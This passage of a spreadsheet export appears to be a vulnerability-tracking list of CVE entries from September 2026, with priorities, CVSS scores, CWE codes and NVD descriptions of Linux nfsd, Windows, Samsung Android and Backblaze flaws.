nfsd_file_dispose_list_delayed() to move it to the per-net dispose list.
If nfsd_file_cache_shutdown_net() runs concurrently, its rhashtable walk
misses the already-unhashed file, and its drain of the per-net dispose
list can run before the file has been queued.  The file then sits on
the per-net list with no thread to drain it, leaking both the file and
its associated state.
The GC worker and shrinker already hold nfsd_gc_lock while walking the
LRU, but in the original code they release it before calling
nfsd_file_dispose_list_delayed().  The fsnotify/lease path
(nfsd_file_close_inode) has no synchronization at all.
Fix this by:
  1. Widening nfsd_gc_lock in both nfsd_file_gc() and nfsd_file_lru_scan()
     to cover the nfsd_file_dispose_list_delayed() call.
  2. Wrapping nfsd_file_close_inode() in nfsd_gc_lock so that all three
     callers of nfsd_file_dispose_list_delayed() hold the lock.
  3. Adding a spin_lock/unlock(nfsd_gc_lock) barrier in
     nfsd_file_cache_shutdown_net() after the purge, so that any
     in-progress disposal has fully completed before the per-net list
     is drained.
All operations inside the lock are non-sleeping (rhashtable lookups,
atomic bit/refcount ops, list moves, svc_wake_up), so the spinlock is
appropriate.</t>
        </is>
      </c>
      <c r="S272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89667</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89682</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr"/>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix fcache_disposal UAF by inlining dispose state into nfsd_net
nfsd_file_dispose_list_delayed() defers fput() to nfsd service threads
via a per-net freeme queue, preventing the shrinker and GC worker from
bearing the cost of closing files (see ffb402596147).  However, the
queue lives in a separately-allocated struct nfsd_fcache_disposal that
is freed by nfsd_free_fcache_disposal_net() during per-net teardown.
The global shrinker, laundrette, and fsnotify callbacks can still be
inside nfsd_file_dispose_list_delayed() dereferencing that pointer,
causing a use-after-free.
Inline the spinlock and freeme list directly into struct nfsd_net (as
fcache_dispose_lock and fcache_dispose_list), eliminating the separately
allocated struct nfsd_fcache_disposal entirely.  These fields now have
the same lifetime as the net namespace itself, so there is no dangling
pointer to chase.
nfsd_file_cache_start_net() now just initializes the inline fields and
cannot fail due to allocation.  nfsd_file_cache_shutdown_net() drains
the inline list directly instead of freeing a separate struct.  The
alloc/free helpers are removed.</t>
        </is>
      </c>
      <c r="S273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89682</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89709</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr"/>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lockd, nfsd: RCU-protect nlmsvc_ops dispatch
nlmsvc_ops is published by nfsd_lockd_init() and cleared by
nfsd_lockd_shutdown() with plain stores, while lockd dereferences
it unguarded from dispatch sites in fs/lockd/svcsubs.c. The pointer
targets nfsd's .rodata and the fopen/fclose callbacks live in nfsd's
.text, so a stale load after rmmod nfsd results in either a NULL
deref or a module-text use-after-free.
Declare nlmsvc_ops as __rcu, publish via rcu_assign_pointer(), clear
via RCU_INIT_POINTER() + synchronize_rcu(). Add a struct module
*owner field to nlmsvc_binding and pin the module across indirect
calls with try_module_get/module_put. When the binding is torn down,
fall back to fput() to avoid leaking struct file references.</t>
        </is>
      </c>
      <c r="S274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89709</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69681</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr"/>
      <c r="Q275" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K27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76" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr"/>
      <c r="Q276" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K27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77" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr"/>
      <c r="Q277" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69777</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr"/>
      <c r="Q278" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t>
        </is>
      </c>
      <c r="S278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19820</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>4ac701fe-44e9-4bcd-9585-dd6449257611</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr"/>
      <c r="Q279" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Backblaze Client allows a local user to make the system not bootable by creating a link from Backblaze's folder to Windows OS system files during a backup. Successful exploitation requires an administrator-level system change that results in the absence of specific Windows OS security controls. This vulnerability is due to improper link resolution.</t>
        </is>
      </c>
      <c r="S279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19820</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21087</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr"/>
      <c r="Q280" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libmdnie.so prior to SMR Sep-2026 Release 1 allows local attackers to execute arbitrary code with system server privilege.</t>
        </is>
      </c>
      <c r="S280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21087</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21090</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr"/>
      <c r="Q281" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsaviextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21090</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21091</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr"/>
      <c r="Q282" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libcodec2secevrcdec.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21091</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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3" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr"/>
      <c r="Q283" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69391</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr"/>
      <c r="Q284" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69426</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr"/>
      <c r="Q285" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69456</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr"/>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr"/>
      <c r="Q286" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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7" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr"/>
      <c r="Q287" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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8" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr"/>
      <c r="Q288" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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9" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr"/>
